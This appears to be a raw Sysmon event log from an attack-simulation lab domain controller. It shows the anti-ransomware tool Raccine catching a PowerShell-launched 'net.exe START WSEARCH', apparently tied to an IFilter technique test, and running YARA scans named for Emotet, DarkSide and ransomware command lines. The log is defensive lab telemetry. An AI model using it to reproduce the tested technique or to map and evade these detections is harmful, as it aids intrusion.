GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247628Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.161{9DBE88B5-5585-61B2-1609-010000000E02}77723492C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1509-010000000E02}6676C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247622Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.149{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1509-010000000E02}6676C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247621Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.148{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1509-010000000E02}6676C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247620Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.148{9DBE88B5-5585-61B2-1509-010000000E02}6676C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247616Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.132{9DBE88B5-5585-61B2-1409-010000000E02}78281108C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1309-010000000E02}4720C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247610Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.119{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1309-010000000E02}4720C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247609Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.119{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1309-010000000E02}4720C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247608Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.119{9DBE88B5-5585-61B2-1309-010000000E02}4720C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247605Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.103{9DBE88B5-5585-61B2-1209-010000000E02}24242688C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-1109-010000000E02}2664C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247599Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.091{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-1109-010000000E02}2664C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247598Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.091{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-1109-010000000E02}2664C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247597Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.091{9DBE88B5-5585-61B2-1109-010000000E02}2664C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247594Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.075{9DBE88B5-5585-61B2-1009-010000000E02}80287400C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-0F09-010000000E02}5376C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247587Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.063{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-0F09-010000000E02}5376C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247586Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.062{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-0F09-010000000E02}5376C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247585Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.062{9DBE88B5-5585-61B2-0F09-010000000E02}5376C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247582Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.047{9DBE88B5-5585-61B2-0E09-010000000E02}67525664C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-0D09-010000000E02}4676C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247576Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.035{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-0D09-010000000E02}4676C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247575Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.035{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-0D09-010000000E02}4676C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247574Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.035{9DBE88B5-5585-61B2-0D09-010000000E02}4676C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247571Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.019{9DBE88B5-5585-61B2-0C09-010000000E02}76966300C:\Windows\system32\conhost.exe{9DBE88B5-5585-61B2-0B09-010000000E02}1792C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247563Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.004{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5585-61B2-0B09-010000000E02}1792C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247562Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.004{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5585-61B2-0B09-010000000E02}1792C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247561Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.004{9DBE88B5-5585-61B2-0B09-010000000E02}1792C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247559Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:13.000{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002247544Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.991{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002247477Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.947{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247475Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.942{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002247460Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.933{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002247393Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.890{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program 